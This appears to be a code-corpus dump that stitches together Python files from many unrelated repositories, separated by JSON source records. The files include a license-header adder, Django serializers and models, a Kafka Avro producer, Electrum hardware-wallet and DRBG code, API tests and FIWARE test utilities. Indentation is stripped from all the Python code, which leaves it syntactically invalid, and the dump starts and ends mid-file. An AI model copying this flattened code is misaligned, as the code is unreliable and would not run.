def add_license(filename, lines):
print("Adding missing license to {}".format(filename))
new_file_content = []
new_file_content.append(license)
new_file_content.extend(lines)
with open(filename, "w") as file:
for line in new_file_content:
file.write(line)
def process_file(filename):
lines = []
with open(filename, "r") as file:
lines = file.readlines()
if '////////////////////////////////////////////////////////////' not in lines[0]:
add_license(filename, lines)
def include_license_for_path(path):
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
filename = os.path.join(root, name)
if ".h" in filename or ".cpp" in filename:
process_file(filename)
def include_license(paths):
for path in paths:
path = path_to_os(path)
if os.path.isdir(path):
include_license_for_path(path)
else:
print("Invalid path! {} is not a valid folder".format(path))
if __name__ == '__main__':
paths = read_parameters()
include_license(paths)
```
|
{
"source": "jesusmah/apic-publish-pipeline",
"score": 2
}
|
#### File: apic-publish-pipeline/scripts/Audit_res.py
```python
import os
import json
FILE_NAME = "Audit_res.py"
AUDIT_FILENAME = "apic-pipeline-audit.json"
def write_to_file(ENV_LOCAL_TARGET_DIR, fileContent):
with open(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME,"w+") as f:
f.write(json.dumps(fileContent))
def readfile_myAudit(ENV_LOCAL_TARGET_DIR):
myAudit = None
if os.path.isfile(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME):
with open(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME) as f:
myAudit = json.load(f)
else:
myAudit = {}
return myAudit
def update_stage_res(ENV_LOCAL_TARGET_DIR, stage_name, stage_res):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
if "STAGE_SUMMARY" in myAudit.keys():
if stage_name in myAudit["STAGE_SUMMARY"]:
myAudit["STAGE_SUMMARY"][stage_name]["Result"] = stage_res
else:
temp = {"Result" : stage_res}
myAudit["STAGE_SUMMARY"][stage_name] = temp
else:
temp = {stage_name : {"Result" : stage_res}}
myAudit["STAGE_SUMMARY"] = temp
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_product_download_audit(ENV_LOCAL_TARGET_DIR, product_download_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in product_download_audit.items():
dyfg = {"Download_Yaml_From_Git" : value}
if "Products" in myAudit.keys():
if key in myAudit["Products"]:
myAudit["Products"][key]["Download_Yaml_From_Git"] = value
else:
myAudit["Products"][key] = dyfg
else:
myAudit["Products"] = {key: dyfg}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_api_download_audit(ENV_LOCAL_TARGET_DIR, api_download_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in api_download_audit.items():
dyfg = {"Download_Yaml_From_Git" : value}
if "APIs" in myAudit.keys():
if key in myAudit["APIs"]:
myAudit["APIs"][key]["Download_Yaml_From_Git"] = value
else:
myAudit["APIs"][key] = dyfg
else:
myAudit["APIs"] = {key: dyfg}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_apic_publish_audit(ENV_LOCAL_TARGET_DIR, apic_publish_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in apic_publish_audit.items():
key = key.replace(".yaml", "")
temp = {"Publish" : value}
if "Products" in myAudit.keys():
if key in myAudit["Products"]:
myAudit["Products"][key]["Publish"] = value
else:
myAudit["Products"][key] = temp
else:
myAudit["Products"] = {key: temp}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_test_apis_audit(ENV_LOCAL_TARGET_DIR, test_apis_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in test_apis_audit.items():
temp = {"Test_Result" : value}
if "APIs" in myAudit.keys():
if key in myAudit["APIs"]:
myAudit["APIs"][key]["Test_Result"] = value
else:
myAudit["APIs"][key] = temp
else:
myAudit["APIs"] = {key: temp}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
```
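For reference, a sketch of the document these helpers accumulate in `apic-pipeline-audit.json` (key names come from the functions above; the concrete entries are invented):
```python
# Illustrative shape only, not real pipeline output.
example_audit = {
    "STAGE_SUMMARY": {"publish-products": {"Result": "SUCCESS"}},
    "Products": {"my-product": {"Download_Yaml_From_Git": "OK", "Publish": "OK"}},
    "APIs": {"my-api": {"Download_Yaml_From_Git": "OK", "Test_Result": "PASSED"}},
}
```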
#### File: apic-publish-pipeline/scripts/parse_api_yaml_get_basepath.py
```python
import yaml
import glob
import os
def get_basepath_from_api(target_dir):
yamlFiles=glob.glob(target_dir + "/*.yaml")
var_api_basepath_list = {}
for ymlFile in yamlFiles:
with open(ymlFile) as f:
# use safe_load instead of load
dataMap = yaml.safe_load(f)
if "basePath" in dataMap:
var_api_name = os.path.basename(ymlFile).replace(".yaml","")
var_api_basepath_list[var_api_name] = dataMap['basePath']
return var_api_basepath_list
```
#### File: apic-publish-pipeline/scripts/print_audit.py
```python
import json
AUDIT_FILENAME = "apic-pipeline-audit.json"
FILE_NAME = "print_audit.py"
INFO = "[INFO]["+ FILE_NAME +"] - "
WORKING_DIR_BASIC = "../WORKSPACE"
def orchestrate():
try:
with open(WORKING_DIR_BASIC + "/" + AUDIT_FILENAME,'r') as f:
data = f.read()
data_json = json.loads(data)
print(INFO + "AUDIT")
print(INFO + "-----")
print(json.dumps(data_json, indent=4, sort_keys=False))
except Exception as e:
raise Exception("[ERROR] - Exception in " + FILE_NAME + ": " + repr(e))
orchestrate()
```
|
{
"source": "jesusmaherrera/django-nuxtjs",
"score": 2
}
|
#### File: core/serializers/question.py
```python
from rest_framework.serializers import CurrentUserDefault, HiddenField, ModelSerializer
from backend.core.models import Choice, Question
from .choice import ChoiceSerializer
class QuestionSerializer(ModelSerializer):
owner = HiddenField(default=CurrentUserDefault())
choices = ChoiceSerializer(many=True)
class Meta:
model = Question
fields = ["id", "text", "creation_date",
"start_date", "end_date", "choices", "owner"]
def create(self, validated_data):
choices = validated_data.pop("choices")
question = Question.objects.create(**validated_data)
for choice in choices:
Choice.objects.create(question=question, **choice)
return question
def update(self, instance, validated_data):
choices = validated_data.pop("choices")
instance.text = validated_data.get("text", instance.text)
instance.start_date = validated_data.get(
"start_date", instance.start_date)
instance.end_date = validated_data.get("end_date", instance.end_date)
instance.save()
keep_choices = []
for choice in choices:
if "id" in choice.keys():
if Choice.objects.filter(id=choice["id"]).exists():
c = Choice.objects.get(id=choice["id"])
c.text = choice.get("text", c.text)
c.save()
keep_choices.append(c.id)
else:
continue
else:
c = Choice.objects.create(question=instance, **choice)
keep_choices.append(c.id)
for choice in instance.choices.all():
if choice.id not in keep_choices:
choice.delete()
return instance
```
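An illustrative payload for the writable nested `choices` field (values are invented; behaviour follows the `create()`/`update()` methods above):
```python
# Hypothetical update payload: choices without an id are created, existing ids are
# updated, and any of the question's other choices are deleted by update().
payload = {
    "text": "Favourite framework?",
    "start_date": "2021-01-01",
    "end_date": "2021-01-31",
    "choices": [
        {"text": "Django"},        # new choice -> created and linked to the question
        {"id": 3, "text": "Vue"},  # existing choice -> text updated and kept
    ],
}
# serializer = QuestionSerializer(instance=question, data=payload)
```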
#### File: core/views/question.py
```python
from rest_framework import status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from backend.core.models import Question
from backend.core.serializers import QuestionSerializer
class QuestionViewSet(viewsets.ModelViewSet):
queryset = Question.objects.all()
serializer_class = QuestionSerializer
@action(detail=False, url_path="current", methods=["GET"])
def current_pools(self, request):
questions = Question.active.all()
serializer = self.get_serializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@action(detail=False, url_path="closed", methods=["GET"])
def closed_pools(self, request):
questions = Question.closed.all()
serializer = self.get_serializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
```
|
{
"source": "jesusmah/vaccine-order-mgr-pg",
"score": 2
}
|
#### File: e2e/kafka/KafkaAvroProducer.py
```python
import json,os
from confluent_kafka import KafkaError
from confluent_kafka import SerializingProducer
from confluent_kafka.serialization import StringSerializer
from confluent_kafka.schema_registry import SchemaRegistryClient
from confluent_kafka.schema_registry.avro import AvroSerializer
import kafka.KafkaConfig as config
class KafkaAvroProducer:
def __init__(self, producer_name, value_schema, groupID = 'KafkaAvroProducer',
kafka_brokers = "",
kafka_user = "",
kafka_pwd = "",
kafka_cacert = "",
kafka_sasl_mechanism = "",
topic_name = ""):
self.kafka_brokers = kafka_brokers
self.kafka_user = kafka_user
self.kafka_pwd = <PASSWORD>
self.kafka_sasl_mechanism = kafka_sasl_mechanism
self.kafka_cacert = kafka_cacert
self.topic_name = topic_name
# Consumer name for logging purposes
self.logging_prefix = '['+ producer_name + '][KafkaAvroProducer]'
# Schema Registry configuration
self.schema_registry_conf = {'url': config.SCHEMA_REGISTRY_URL}
# Schema Registry Client
self.schema_registry_client = SchemaRegistryClient(self.schema_registry_conf)
# String Serializer for the key
self.key_serializer = StringSerializer('utf_8')
# Avro Serializer for the value
print(value_schema)
print(type(value_schema))
value_schema=value_schema.strip()
self.value_serializer = AvroSerializer(value_schema, self.schema_registry_client)
# Get the producer configuration
self.producer_conf = self.getProducerConfiguration(groupID,
self.key_serializer,
self.value_serializer)
# Create the producer
self.producer = SerializingProducer(self.producer_conf)
def delivery_report(self,err, msg):
""" Called once for each message produced to indicate delivery result. Triggered by poll() or flush(). """
if err is not None:
print('[KafkaAvroProducer] - [ERROR] - Message delivery failed: {}'.format(err))
else:
print('[KafkaAvroProducer] - Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def publishEvent(self, key, value, topicName = 'kafka-avro-producer'):
# Produce the Avro message
self.producer.produce(topic=topicName,value=value,key=key, on_delivery=self.delivery_report)
# Flush
self.producer.flush()
def getProducerConfiguration(self,groupID,key_serializer,value_serializer):
try:
options ={
'bootstrap.servers': os.environ['KAFKA_BROKERS'],
'group.id': groupID,
'key.serializer': key_serializer,
'value.serializer': value_serializer
}
if (os.getenv('KAFKA_PASSWORD','') != ''):
# Set security protocol common to ES on prem and on IBM Cloud
options['security.protocol'] = 'SASL_SSL'
# Depending on the Kafka User, we will know whether we are talking to ES on prem or on IBM Cloud
# If we are connecting to ES on IBM Cloud, the SASL mechanism is plain
if (os.getenv('KAFKA_USER','') == 'token'):
options['sasl.mechanisms'] = 'PLAIN'
# If we are connecting to ES on OCP, the SASL mechanism is scram-sha-512
else:
options['sasl.mechanisms'] = 'SCRAM-SHA-512'
# Set the SASL username and password
options['sasl.username'] = os.getenv('KAFKA_USER','')
options['sasl.password'] = os.getenv('KAFKA_PASSWORD','')
# If we are talking to ES on prem, it uses an SSL self-signed certificate.
# Therefore, we need the CA public certificate for the SSL connection to happen.
if (os.path.isfile(os.getenv('KAFKA_CERT','/certs/es-cert.pem'))):
options['ssl.ca.location'] = os.getenv('KAFKA_CERT','/certs/es-cert.pem')
return options
except KeyError as error:
print('[KafkaAvroProducer] - [ERROR] - A required environment variable does not exist: ' + str(error))
return {}
```
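A minimal usage sketch (the Avro schema, topic and key are invented; broker and schema-registry settings still come from the environment variables and `KafkaConfig` used above):
```python
# Hypothetical producer for an order event; value_schema must be an Avro schema string.
ORDER_SCHEMA = """
{
  "type": "record",
  "name": "OrderEvent",
  "fields": [
    {"name": "orderID", "type": "string"},
    {"name": "status", "type": "string"}
  ]
}
"""
producer = KafkaAvroProducer("OrderEventProducer", ORDER_SCHEMA)
producer.publishEvent(key="order-01",
                      value={"orderID": "order-01", "status": "OPEN"},
                      topicName="vaccine.orders")
```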
|
{
"source": "jesusmgg/jesus_management",
"score": 2
}
|
#### File: jesus_management/accounting/models.py
```python
from decimal import Decimal
from django.db import models
from django.utils import timezone
####################################################################
# TAXES
####################################################################
class Tax(models.Model):
name = models.CharField(max_length=30)
rate = models.DecimalField(default=10.0, decimal_places=2, max_digits=15)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Taxes'
####################################################################
####################################################################
# RECORDS
####################################################################
class Record(models.Model):
date = models.DateField(default=timezone.now)
class RecordItem(models.Model):
description = models.CharField(max_length=200)
ammount = models.DecimalField(default=0.0, decimal_places=2, max_digits=15)
tax = models.ManyToManyField(Tax)
record = models.ForeignKey(Record, on_delete=models.CASCADE)
class Income(Record):
pass
class Expense(Record):
pass
####################################################################
```
|
{
"source": "jesusmgg/jesusmg.net",
"score": 2
}
|
#### File: jesusmg.net/blog/models.py
```python
from django.contrib.auth.models import User
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
from django.template import defaultfilters
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'categories'
class Post(models.Model):
date = models.DateField(auto_now_add=True)
title = models.CharField(max_length=50)
slug = models.SlugField(max_length=100, blank=True)
author = models.ForeignKey(User)
category = models.ForeignKey(Category, on_delete=models.PROTECT)
preview_image = models.ImageField(upload_to='blog/preview_image/', blank=True, null=True)
content = RichTextUploadingField()
published = models.BooleanField(default=False)
def save(self, *args, **kwargs):
self.slug = defaultfilters.slugify(self.title)
super(Post, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('post', kwargs={'slug': self.slug, 'id': self.id})
def __str__(self):
return self.title
class Meta:
verbose_name_plural = 'posts'
```
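A brief sketch of the slug behaviour defined in `save()` above (the author/category objects are assumed to exist; the URL shape depends on the project's URLconf):
```python
# Hypothetical shell session: the slug is regenerated from the title on every save().
post = Post(title="My First Post", author=user, category=category, content="<p>hi</p>")
post.save()
post.slug                # 'my-first-post'
post.get_absolute_url()  # reverse('post', kwargs={'slug': 'my-first-post', 'id': post.id})
```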
|
{
"source": "jesusmiguelgarcia/FSTmikes",
"score": 3
}
|
#### File: feature_space_tree/attributes/cliente_freeling_mk.py
```python
import re, string
import nltk
from sys import stderr, version
import socket
import sys
# Mike's code, based on pynlpl
# returns lemmas, tags, and tuples (text, lemma, tag)
# use with a regexp that tokenizes the text, e.g.:
#regexp = "[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+-*[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[.]+|[/,$?:;!()&%#=+{}*~.]+"
#linex = "Mary año tiene un borrego acasffss. es una causa perdida. Los niños juegan."
#line = " Los niños juegan. La propuesta se distingue por incorporar la representación de la experiencia en el modelo del estudiante. Generalmente, las aplicaciones afines se concentran en representar el conocimiento adquirido por el estudiante GRUNDY (Rich, 1979), sus atributos personales Smex Web (Albrecht et al., 2000), conductas observadas ELM-PE (Brusilovsky, 1995b), distorsiones en el aprendizaje Modelos de Diagnóstico (Brown y Burton, 1978) y el conocimiento de enseñanza ADAPS (Brusilovsky y Cooper, 1999). En cambio, en el presente trabajo los atributos de la experiencia forman parte del propio modelo del estudiante. Como resultado, se obtiene una representación más rica del fenómeno de estudio, puesto que se consideran a dos protagonistas: el emisor y el receptor del conocimiento que se transmite y adquiere."
#words, postags, lemmas, tuplas = POS_freeling(linex, regexp)
#print tuplas
def u(s, encoding = 'utf-8', errors='strict'):
#ensure s is properly unicode.. wrapper for python 2.6/2.7,
if version < '3':
#ensure the object is unicode
if isinstance(s, unicode):
return s
else:
return unicode(s, encoding,errors=errors)
else:
#will work on byte arrays
if isinstance(s, str):
return s
else:
return str(s,encoding,errors=errors)
def b(s):
#ensure s is bytestring
if version < '3':
#ensure the object is unicode
if isinstance(s, str):
return s
else:
return s.encode('utf-8')
else:
#will work on byte arrays
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8')
def POS_freeling(texto, regexp):
# preprocessing step: the text is tokenized into a word list
# this could also be done after the POS filter, since the words are
# already available as a list there
host = "localhost"
port = 50005
debug=True
tokens = nltk.regexp_tokenize(texto, regexp)
texto_s= " ".join(tokens)
sourcewords_s = texto_s
sourcewords = tokens
encoding='utf-8'
timeout=120.0
host = "localhost"
port = 50005
BUFSIZE = 10240
socketx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socketx.settimeout(timeout)
socketx.connect( (host,int(port)) )
socketx.sendall('RESET_STATS\0')
r = socketx.recv(BUFSIZE)
if not r.strip('\0') == 'FL-SERVER-READY':
raise Exception("Server not ready")
# else:
# print "server ready"
# the text is sent as a single space-separated string
socketx.sendall(b(sourcewords_s) + '\n\0')  # works with plain str, not with unicode/UTF (careful)
#print "Sent:",line2s,file=sys.stderr
debug = False
results = []
done = False
while not done:
data = b""
while not data:
buffer = socketx.recv(BUFSIZE)
#print("Buffer: ["+repr(buffer)+"]")
#print buffer
if buffer[-1] == '\0':
data += buffer[:-1]
done = True
break
else:
data += buffer
#print data
data = u(data, encoding)  # convert to utf-8
#if debug: print("Received:",data)
for i, line in enumerate(data.strip(' \t\0\r\n').split('\n')):
if not line.strip():
done = True
break
else:
cols = line.split(" ")
subwords = cols[0].lower().split("_")
if len(cols) > 2: #this seems a bit odd?
for word in subwords: #split multiword expressions
results.append( (word, cols[1], cols[2], i, len(subwords) > 1 ) ) #word, lemma, pos, index, multiword?
#print results
if debug: print("Received:",results)
words = []
postags = []
lemmas = []
for fields in results:
word, lemma,pos = fields[:3]
words.append(word)
postags.append(pos)
lemmas.append(lemma)
#print lemmas,"\n", postags,"\n" , words
return words, postags, lemmas, results
#---------------------------------------------------------
#words = line.strip().split(' ')  # must be passed as a list or as space-separated text
# it can be passed line by line or simply as a space-separated string
# accepts either a list or plain space-separated text
# 3 options
# FreeLing is used to obtain lemmas and tags
# # #
# regexp = "[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+-*[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[.]+|[/,$?:;!()&%#=+{}*~.]+"
#
# linex = "Mary año tiene un borrego acasffss. es una causa perdida. Los niños juegan."
# line = " Los niños juegan. La propuesta se distingue por incorporar la representación de la experiencia en el modelo del estudiante. Generalmente, las aplicaciones afines se concentran en representar el conocimiento adquirido por el estudiante GRUNDY (Rich, 1979), sus atributos personales Smex Web (Albrecht et al., 2000), conductas observadas ELM-PE (Brusilovsky, 1995b), distorsiones en el aprendizaje Modelos de Diagnóstico (Brown y Burton, 1978) y el conocimiento de enseñanza ADAPS (Brusilovsky y Cooper, 1999). En cambio, en el presente trabajo los atributos de la experiencia forman parte del propio modelo del estudiante. Como resultado, se obtiene una representación más rica del fenómeno de estudio, puesto que se consideran a dos protagonistas: el emisor y el receptor del conocimiento que se transmite y adquiere."
# words, postags, lemmas, tuplas = POS_freeling(linex, regexp)
#
# print tuplas
#
# #parte de POS
# sufix_tag = []
# for i in range(len(postags)):
# print postags[i]
# if len(postags[i])>4:
# sufix_tag.append(postags[i][0:4])
# else:
# sufix_tag.append(postags[i])
#
# print sufix_tag
# #
```
|
{
"source": "JesusMtnez/devexperto-challenge",
"score": 4
}
|
#### File: kata/tests/test_game.py
```python
import unittest
from game import Game
class BowlingGameTest(unittest.TestCase):
def setUp(self):
self.g = Game()
def tearDown(self):
self.g = None
def _roll_many(self, n, pins):
"Roll 'n' times a roll of 'pins' pins"
for i in range(n):
self.g.roll(pins)
def _roll_spare(self):
"Roll a spare"
self.g.roll(5)
self.g.roll(5)
def _roll_strike(self):
"Roll a strike"
self.g.roll(10)
def test_gutter_game(self):
self._roll_many(20, 0)
self.assertEqual(0, self.g.score())
def test_all_ones(self):
self._roll_many(20, 1)
self.assertEqual(20, self.g.score())
def test_one_spare(self):
self._roll_spare()
self.g.roll(3)
self._roll_many(17, 0)
self.assertEqual(16, self.g.score())
def test_one_strike(self):
self._roll_strike()
self.g.roll(3)
self.g.roll(4)
self._roll_many(16, 0)
self.assertEqual(24, self.g.score())
def test_perfect_game(self):
self._roll_many(12, 10)
self.assertEqual(300, self.g.score())
if __name__ == '__main__':
unittest.main()
```
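The tests above fully specify the kata's scoring rules; a minimal `Game` sketch that satisfies them (not necessarily the repository's actual implementation) could look like this:
```python
# Minimal bowling Game consistent with the tests above.
class Game:
    def __init__(self):
        self._rolls = []

    def roll(self, pins):
        self._rolls.append(pins)

    def score(self):
        total, i = 0, 0
        for _frame in range(10):
            if self._rolls[i] == 10:                          # strike
                total += 10 + self._rolls[i + 1] + self._rolls[i + 2]
                i += 1
            elif self._rolls[i] + self._rolls[i + 1] == 10:   # spare
                total += 10 + self._rolls[i + 2]
                i += 2
            else:                                             # open frame
                total += self._rolls[i] + self._rolls[i + 1]
                i += 2
        return total
```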
|
{
"source": "Jesusown/electrum",
"score": 2
}
|
#### File: plugins/keepkey/client.py
```python
from keepkeylib.client import proto, BaseClient, ProtocolMixin
from .clientbase import KeepKeyClientBase
class KeepKeyClient(KeepKeyClientBase, ProtocolMixin, BaseClient):
def __init__(self, transport, handler, plugin):
BaseClient.__init__(self, transport)
ProtocolMixin.__init__(self, transport)
KeepKeyClientBase.__init__(self, handler, plugin, proto)
def recovery_device(self, *args):
ProtocolMixin.recovery_device(self, False, *args)
KeepKeyClientBase.wrap_methods(KeepKeyClient)
```
#### File: plugins/revealer/hmac_drbg.py
```python
import hashlib
import hmac
class DRBG(object):
def __init__(self, seed):
self.key = b'\x00' * 64
self.val = b'\x01' * 64
self.reseed(seed)
def hmac(self, key, val):
return hmac.new(key, val, hashlib.sha512).digest()
def reseed(self, data=b''):
self.key = self.hmac(self.key, self.val + b'\x00' + data)
self.val = self.hmac(self.key, self.val)
if data:
self.key = self.hmac(self.key, self.val + b'\x01' + data)
self.val = self.hmac(self.key, self.val)
def generate(self, n):
xs = b''
while len(xs) < n:
self.val = self.hmac(self.key, self.val)
xs += self.val
self.reseed()
return xs[:n]
```
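The generator is fully deterministic given its seed, which is what the revealer plugin relies on; a small illustrative check (seeds are invented):
```python
# Same seed -> same byte stream; different seed -> (practically certain) different stream.
seed = b'example-seed'
assert DRBG(seed).generate(32) == DRBG(seed).generate(32)
assert DRBG(seed).generate(32) != DRBG(b'other-seed').generate(32)
```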
|
{
"source": "jesuspabloalfaro/Find4J",
"score": 3
}
|
#### File: jesuspabloalfaro/Find4J/Find4JModule.py
```python
import csv
import sys
import nmap
class IntOutOfBounds(Exception):
pass
class PortOutOfBounds(Exception):
pass
class Find4JClass():
def banner():
""" Banner for Find4J """
print("""
______ _ _ ___ ___
| ___(_) | | / | |_ |
| |_ _ _ __ __| |/ /| | | |
| _| | | '_ \ / _` / /_| | | |
| | | | | | | (_| \___ |/\__/ /
\_| |_|_| |_|\__,_| |_/\____/
""")
print("Find4J is a Python script to find applications potentially vulnerable to log4j.")
print("Developed By: <NAME>")
print("Based on Python-Nmap\n")
def create_scan(ip, ports):
""" Function to create scan with user inputs """
nm = nmap.PortScanner()
nm.scan(hosts=ip, arguments='-sV -sC')
return nm, ip, ports
def compare_data(self, product):
""" Function to compare found products with that of known log4j vulnerabilities """
with open("vuln.csv", 'r') as f:
reader = csv.reader(f, delimiter="\n")
for vuln in reader:
if str(product) in str(vuln):
return True
def print_scan_data(self, scan):
""" Function to print product scan data """
nm, ip, port = scan
vulnerable = []
ports = nm[ip]['tcp'].keys()
for host in nm.all_hosts():
for port in ports:
product = nm[host]['tcp'][port]['product']
if self.compare_data(product):
vulnerable.append([host, product])
def output_scan_data():
""" Function to output scan data to csv """
raise NotImplementedError
```
|
{
"source": "JesusPaz/sd-midterm2",
"score": 3
}
|
#### File: sd-midterm2/test/tests.py
```python
import unittest
import requests
import json
class TestUsersApi(unittest.TestCase):
API_URL = "http://apiflask-env.uuhyrnua83.us-east-2.elasticbeanstalk.com"
def test_get_all_users(self):
response = requests.get(self.API_URL+'/users',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 200, "Should be 200")
def test_path_not_found(self):
response = requests.get(self.API_URL+'/user',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 404, "Should be 404")
def test_add_new_user(self):
response = requests.post(self.API_URL+'/users/JesusPaz',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 200, "Should be 200")
data = json.loads(response.content)
aux = json.loads(data)
userId = aux["id"]
numRepos = aux["numRepos"]
# Delete the user so the test can be run again
response = requests.delete(self.API_URL+'/users/JesusPaz',
headers={'Accept': 'application/json'})
# test deleted ok
self.assertEqual(response.status_code, 200, "Should be 200")
self.assertTrue(userId != "" and userId != None, "Can not be empty or None")
# Commented out because new repos are created all the time, so the expected count changes
# With a stable account this assertion would hold:
# self.assertEqual(numRepos, 22, "Number of repos should be 22")
def test_add_new_user_empty_name(self):
response = requests.post(self.API_URL+'/users/ ',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_add_new_user_exists_in_database(self):
response = requests.post(self.API_URL+'/users/danielq97',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_add_new_user_dont_exists_in_github(self):
response = requests.post(self.API_URL+'/users/atdgps85632s',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_delete_user_dont_exist(self):
response = requests.delete(self.API_URL+'/users/atdgps85632s',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
def test_delete_user_empty_name(self):
response = requests.delete(self.API_URL+'/users/ ',
headers={'Accept': 'application/json'})
self.assertEqual(response.status_code, 400, "Should be 400")
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jesuspg/fiware-puppetwrapper",
"score": 2
}
|
#### File: acceptance_tests/commons/authentication_utils.py
```python
__author__ = 'jfernandez'
import json
from rest_utils import RestUtils
from configuration import CONFIG_KEYSTONE_TENANT_NAME_VALUE, \
CONFIG_KEYSTONE_USERNAME_VALUE, CONFIG_KEYSTONE_PWD_VALUE
from constants import AUTH_TENANT_NAME, AUTH_PASSWORD, AUTH_USERNAME, AUTH, AUTH_ACCESS, AUTH_TENANT, AUTH_TOKEN, \
AUTH_ID, AUTH_PASSWORD_CREDENTIALS, CONTENT_TYPE, CONTENT_TYPE_JSON, ACCEPT_HEADER, ACCEPT_HEADER_JSON
KEYSTONE_BODY = {AUTH: {AUTH_TENANT_NAME: CONFIG_KEYSTONE_TENANT_NAME_VALUE,
AUTH_PASSWORD_CREDENTIALS: {AUTH_USERNAME: CONFIG_KEYSTONE_USERNAME_VALUE,
AUTH_PASSWORD: <PASSWORD>_KEYSTONE_PWD_VALUE}}}
CONFIG_KEYSTONE_HEADERS = {CONTENT_TYPE: CONTENT_TYPE_JSON, ACCEPT_HEADER: ACCEPT_HEADER_JSON}
def get_auth_data_from_keystone():
body = json.dumps(KEYSTONE_BODY)
r = RestUtils.get_keystone_token(body=body, headers=CONFIG_KEYSTONE_HEADERS)
response = r.json()
token_id = response[AUTH_ACCESS][AUTH_TOKEN][AUTH_ID]
tenant_id = response[AUTH_ACCESS][AUTH_TOKEN][AUTH_TENANT][AUTH_ID]
return token_id, tenant_id
```
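Typical use in the acceptance tests is to fetch a scoped token once and reuse it in request headers (a sketch; the header names live in the constants module, which is not shown here):
```python
# Hypothetical usage: obtain Keystone credentials for subsequent SDC requests.
token_id, tenant_id = get_auth_data_from_keystone()
# Headers are then built from these values, e.g. via commons.utils.set_default_headers(token_id, tenant_id).
```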
#### File: acceptance_tests/commons/install_model.py
```python
__author__ = 'jfernandez'
from constants import GROUP, VERSION, SOFTWARE_NAME, OP_SOFTWARE_NAME, INSTALL_ATTRIBUTES, ACTION, INSTALL, UNINSTALL
# Model: {"attributes": [], "version": "", "group": "", "softwareName": ""}
def install_simple_model(version, group, software_name):
return {VERSION: version, GROUP: group, SOFTWARE_NAME: software_name}
def install_attributes_model(version, group, software_name, attribute_list):
return {VERSION: version, GROUP: group, SOFTWARE_NAME: software_name, INSTALL_ATTRIBUTES: attribute_list}
def _software_to_manage_response_model(software_name, version, action, attributes):
if attributes is not None:
return {OP_SOFTWARE_NAME: software_name, VERSION: version, ACTION: action, INSTALL_ATTRIBUTES: attributes}
else:
return {OP_SOFTWARE_NAME: software_name, VERSION: version, ACTION: action}
def software_to_install_response_model(software_name, version, attributes=None):
return _software_to_manage_response_model(software_name, version, INSTALL, attributes)
def software_to_uninstall_response_model(software_name, version, attributes=None):
return _software_to_manage_response_model(software_name, version, UNINSTALL, attributes)
```
|
{
"source": "jesuspg/fiware-sdc",
"score": 2
}
|
#### File: acceptance/commons/rest_utils.py
```python
__author__ = 'arobres, jfernandez'
from json import JSONEncoder
from configuration import SDC_IP, SDC_PORT, SDC_PROTOCOL, CONFIG_PUPPETDB_PROTOCOL, CONFIG_PUPPETDB_IP,\
CONFIG_PUPPETDB_PORT
from constants import *
import requests
SDC_SERVER = '{}://{}:{}'.format(SDC_PROTOCOL, SDC_IP, SDC_PORT)
PRODUCT_PATTERN_ROOT = '{url_root}/sdc/rest/catalog/product/'
PRODUCT_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}'
PRODUCT_RELEASE_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/release'
VERSION_RELEASE_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/release/{version}'
PRODUCT_ATTRIBUTES_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/attributes'
PRODUCT_METADATA_LIST_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/metadatas'
PRODUCT_METADATA_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}/metadatas/{metadata_key}'
PRODUCTANDRELEASE_PATTERN_ROOT = '{url_root}/sdc/rest/catalog/productandrelease/'
INSTALL_PATTERN = '{url_root}/sdc/rest/vdc/{vdc_id}/productInstance'
PRODUCT_INSTALLED_PATTERN = '{url_root}/sdc/rest/vdc/{vdc_id}/productInstance/{product_id}'
TASK_PATTERN_ROOT = '{url_root}/sdc/rest/vdc/{vdc_id}/task'
TASK_PATTERN = "{url_root}/sdc/rest/vdc/{vdc_id}/task/{task_id}"
NODE_PATTERN_ROOT = "{url_root}/sdc/rest/vdc/{vdc_id}/chefClient"
